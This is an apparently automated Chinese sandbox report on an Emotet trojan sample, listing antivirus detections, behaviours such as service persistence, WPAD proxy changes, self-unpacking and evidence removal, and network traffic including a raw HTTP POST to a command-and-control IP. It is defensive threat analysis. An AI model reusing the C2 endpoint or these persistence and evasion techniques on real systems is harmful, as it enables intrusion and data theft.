9.6
极危
53 个模型检测该样本为恶意!
重新分析
更多

200377720d42c4f7fe16223d5888b11a1955d9d060d7bd01c09d9f378d41f774

0526f4e11cb86ca73e6c5621fddb342b.exe

分析耗时

89s

最近分析

文件大小

136.1KB
静态报毒 动态报毒 100% AFW2WFAGSKK AI SCORE=82 AIDETECTVM ATTRIBUTE BANKERX CLASSIC CONFIDENCE ELDORADO EMOTET EMOTETU GENCIRC HIGH CONFIDENCE HIGHCONFIDENCE IY1@A0NYPPMI IY1@B0NYPPMI KCLOUD KRYPTIK MALWARE1 MALWARE@#25CIOIOBDC8NN QQXKG R339917 SCORE SUSGEN TRICKBOT UNSAFE ZEXTET 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/Emotet.476ddc06 20190527 0.3.0.5
Avast Win32:BankerX-gen [Trj] 20201210 21.1.5827.0
Tencent Malware.Win32.Gencirc.1192d417 20201211 1.0.0.1
Baidu 20190318 1.0.0.2
Kingsoft Win32.Hack.Emotet.k.(kcloud) 20201211 2017.9.26.565
McAfee Emotet-FQX!0526F4E11CB8 20201211 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619164725.306751
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (3 个事件)
Time & API Arguments Status Return Repeated
1619164709.759751
CryptGenKey
crypto_handle: 0x00590840
algorithm_identifier: 0x0000660e ()
provider_handle: 0x00590508
flags: 1
key: fBeaÂå 0éÖÏýôÉ{Á
success 1 0
1619164725.353751
CryptExportKey
crypto_handle: 0x00590840
crypto_export_handle: 0x00590800
buffer: f¤3*;qJ†)ß’G¢â_ýôkú$€ºãhvìYᆠç"(Džk ç‰îi_^í¡—)”áÌozöwg«¿ePWã½ÊM<²‘B¾®kâÒm‹]`s"ê¯w
blob_type: 1
flags: 64
success 1 0
1619164758.806751
CryptExportKey
crypto_handle: 0x00590840
crypto_export_handle: 0x00590800
buffer: f¤“Ôæ–\QDÁ#y¦ü.ÚaÙ|­ȁ ¹ìoZg;€Fî=‘çŒ–£uò@-]JŽ–°Õ†miRŠhˆþ«”¾X¤ª;:}3çm…¯’~”Õ ý0ɪåì¯ Ô_¯žD
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features Connection to IP address suspicious_request POST http://192.241.220.183:8080/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
Performs some HTTP requests (1 个事件)
request POST http://192.241.220.183:8080/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
Sends data using the HTTP POST Method (1 个事件)
request POST http://192.241.220.183:8080/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619134516.625727
NtAllocateVirtualMemory
process_identifier: 2712
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x007e0000
success 0 0
1619164775.415374
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000004070000
success 0 0
1619164704.681751
NtAllocateVirtualMemory
process_identifier: 2476
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00480000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619134519.672727
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\0526f4e11cb86ca73e6c5621fddb342b.exe
newfilepath: C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe
newfilepath_r: C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\0526f4e11cb86ca73e6c5621fddb342b.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619164725.759751
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process nlsdata0027.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619164725.446751
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (3 个事件)
host 172.217.24.14
host 190.19.169.69
host 192.241.220.183
Installs itself for autorun at Windows startup (1 个事件)
service_name NlsData0027 service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619134520.063727
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x024301b8
display_name: NlsData0027
error_control: 0
service_name: NlsData0027
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe"
filepath_r: "C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe"
service_manager_handle: 0x008792f8
desired_access: 2
service_type: 16
password:
success 37945784 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619164728.337751
RegSetValueExA
key_handle: 0x0000036c
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619164728.337751
RegSetValueExA
key_handle: 0x0000036c
value: À’+ò7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619164728.337751
RegSetValueExA
key_handle: 0x0000036c
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619164728.337751
RegSetValueExW
key_handle: 0x0000036c
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619164728.353751
RegSetValueExA
key_handle: 0x00000384
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619164728.353751
RegSetValueExA
key_handle: 0x00000384
value: À’+ò7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619164728.353751
RegSetValueExA
key_handle: 0x00000384
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619164728.368751
RegSetValueExW
key_handle: 0x00000368
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe:Zone.Identifier
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 个事件)
dead_host 190.19.169.69:443
File has been identified by 53 AntiVirus engines on VirusTotal as malicious (50 out of 53 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.EmotetU.Gen.iy1@b0NypPmi
FireEye Trojan.EmotetU.Gen.iy1@b0NypPmi
Qihoo-360 Win32/Backdoor.59e
ALYac Trojan.EmotetU.Gen.iy1@b0NypPmi
Cylance Unsafe
K7AntiVirus Trojan ( 0056cd0a1 )
Alibaba Trojan:Win32/Emotet.476ddc06
K7GW Trojan ( 0056cd0a1 )
Arcabit Trojan.EmotetU.Gen.EDD099
BitDefenderTheta Gen:NN.Zextet.34670.iy1@a0NypPmi
Cyren W32/Trickbot.DX.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Malware.Emotet-8085029-0
Kaspersky HEUR:Backdoor.Win32.Emotet.vho
BitDefender Trojan.EmotetU.Gen.iy1@b0NypPmi
Paloalto generic.ml
AegisLab Trojan.Win32.Emotet.L!c
Tencent Malware.Win32.Gencirc.1192d417
Ad-Aware Trojan.EmotetU.Gen.iy1@b0NypPmi
Emsisoft Trojan.Emotet (A)
Comodo Malware@#25cioiobdc8nn
F-Secure Trojan.TR/AD.Emotet.qqxkg
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.EMOTET.SMT.hp
McAfee-GW-Edition BehavesLike.Win32.Emotet.cm
Sophos Mal/Generic-S
Ikarus Trojan-Banker.Emotet
Jiangmin Backdoor.Emotet.ii
Avira TR/AD.Emotet.qqxkg
MAX malware (ai score=82)
Antiy-AVL Trojan[Backdoor]/Win32.Emotet
Kingsoft Win32.Hack.Emotet.k.(kcloud)
Microsoft Trojan:Win32/Emotet.DSH!MTB
ZoneAlarm HEUR:Backdoor.Win32.Emotet.vho
GData Trojan.EmotetU.Gen.iy1@b0NypPmi
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.RL_Generic.R339917
McAfee Emotet-FQX!0526F4E11CB8
VBA32 Trojan.Emotet
Malwarebytes Trojan.Emotet
ESET-NOD32 Win32/Emotet.CD
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.SMT.hp
Rising Trojan.Kryptik!1.C89F (CLASSIC)
Yandex Trojan.Emotet!afw2WFagsKk
Fortinet W32/Emotet.CD!tr
AVG Win32:BankerX-gen [Trj]
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-06-08 18:10:55

Imports

Library MFC42.DLL:
0x40e780
0x40e784
0x40e788
0x40e78c
0x40e790
0x40e794
0x40e798
0x40e79c
0x40e7a0
0x40e7a4
0x40e7a8
0x40e7ac
0x40e7b0
0x40e7b4
0x40e7b8
0x40e7bc
0x40e7c0
0x40e7c4
0x40e7c8
0x40e7cc
0x40e7d0
0x40e7d4
0x40e7d8
0x40e7dc
0x40e7e0
0x40e7e4
0x40e7e8
0x40e7ec
0x40e7f0
0x40e7f4
0x40e7f8
0x40e7fc
0x40e800
0x40e804
0x40e808
0x40e80c
0x40e810
0x40e814
0x40e818
0x40e81c
0x40e820
0x40e824
0x40e828
0x40e82c
0x40e830
0x40e834
0x40e838
0x40e83c
0x40e840
0x40e844
0x40e848
0x40e84c
0x40e850
0x40e854
0x40e858
0x40e85c
0x40e860
0x40e864
0x40e868
0x40e86c
0x40e870
0x40e874
0x40e878
0x40e87c
0x40e880
0x40e884
0x40e888
0x40e88c
0x40e890
0x40e894
0x40e898
0x40e89c
0x40e8a0
0x40e8a4
0x40e8a8
0x40e8ac
0x40e8b0
0x40e8b4
0x40e8b8
0x40e8bc
0x40e8c0
0x40e8c4
0x40e8c8
0x40e8cc
0x40e8d0
0x40e8d4
0x40e8d8
0x40e8dc
0x40e8e0
0x40e8e4
0x40e8e8
0x40e8ec
0x40e8f0
0x40e8f4
0x40e8f8
0x40e8fc
0x40e900
0x40e904
0x40e908
0x40e90c
0x40e910
0x40e914
0x40e918
0x40e91c
0x40e920
0x40e924
0x40e928
0x40e92c
0x40e930
0x40e934
0x40e938
0x40e93c
0x40e940
0x40e944
0x40e948
0x40e94c
0x40e950
0x40e954
0x40e958
0x40e95c
0x40e960
0x40e964
0x40e968
0x40e96c
0x40e970
0x40e974
0x40e978
0x40e97c
0x40e980
0x40e984
0x40e988
0x40e98c
0x40e990
0x40e994
0x40e998
0x40e99c
0x40e9a0
0x40e9a4
0x40e9a8
0x40e9ac
0x40e9b0
0x40e9b4
0x40e9b8
0x40e9bc
0x40e9c0
0x40e9c4
0x40e9c8
0x40e9cc
0x40e9d0
0x40e9d4
0x40e9d8
0x40e9dc
0x40e9e0
0x40e9e4
0x40e9e8
0x40e9ec
0x40e9f0
0x40e9f4
0x40e9f8
0x40e9fc
0x40ea00
0x40ea04
0x40ea08
0x40ea0c
0x40ea10
0x40ea14
0x40ea18
0x40ea1c
0x40ea20
0x40ea24
0x40ea28
0x40ea2c
0x40ea30
0x40ea34
0x40ea38
0x40ea3c
0x40ea40
0x40ea44
0x40ea48
0x40ea4c
0x40ea50
0x40ea54
0x40ea58
0x40ea5c
0x40ea60
0x40ea64
0x40ea68
0x40ea6c
0x40ea70
0x40ea74
0x40ea78
0x40ea7c
0x40ea80
0x40ea84
0x40ea88
0x40ea8c
0x40ea90
0x40ea94
0x40ea98
0x40ea9c
0x40eaa0
0x40eaa4
0x40eaa8
0x40eaac
0x40eab0
0x40eab4
0x40eab8
0x40eabc
0x40eac0
0x40eac4
0x40eac8
0x40eacc
0x40ead0
Library MSVCRT.dll:
0x40ebfc __CxxFrameHandler
0x40ec00 __setusermatherr
0x40ec04 _adjust_fdiv
0x40ec08 __p__commode
0x40ec0c __p__fmode
0x40ec10 __set_app_type
0x40ec14 _except_handler3
0x40ec18 _setmbcp
0x40ec1c __dllonexit
0x40ec20 _controlfp
0x40ec24 _initterm
0x40ec28 __getmainargs
0x40ec2c _acmdln
0x40ec30 exit
0x40ec34 _XcptFilter
0x40ec38 _exit
0x40ec3c _onexit
Library KERNEL32.dll:
0x40e734 GetStartupInfoA
0x40e738 GetModuleHandleA
0x40e73c LoadLibraryExA
0x40e740 SizeofResource
0x40e744 GetCurrentProcess
0x40e748 lstrlenA
0x40e74c GetVersionExA
Library USER32.dll:
0x40ec78 GetSystemMenu
0x40ec7c DestroyIcon
0x40ec80 GetParent
0x40ec84 UpdateWindow
0x40ec88 CopyRect
0x40ec8c GetFocus
0x40ec90 SendMessageA
0x40ec94 FillRect
0x40ec98 DrawFocusRect
0x40ec9c LockWindowUpdate
0x40eca0 InvalidateRect
0x40eca4 EnableWindow
0x40eca8 GetSysColor
Library GDI32.dll:
Library COMCTL32.dll:
0x40e6c0 ImageList_GetIcon
0x40e6cc ImageList_Draw
0x40e6d0 ImageList_DrawEx
Library MSVCP60.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49180 192.241.220.183 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://192.241.220.183:8080/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/ 
POST /NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/ HTTP/1.1
Referer: http://192.241.220.183/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
Content-Type: multipart/form-data; boundary=---------------------------026380977057584
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.241.220.183:8080
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.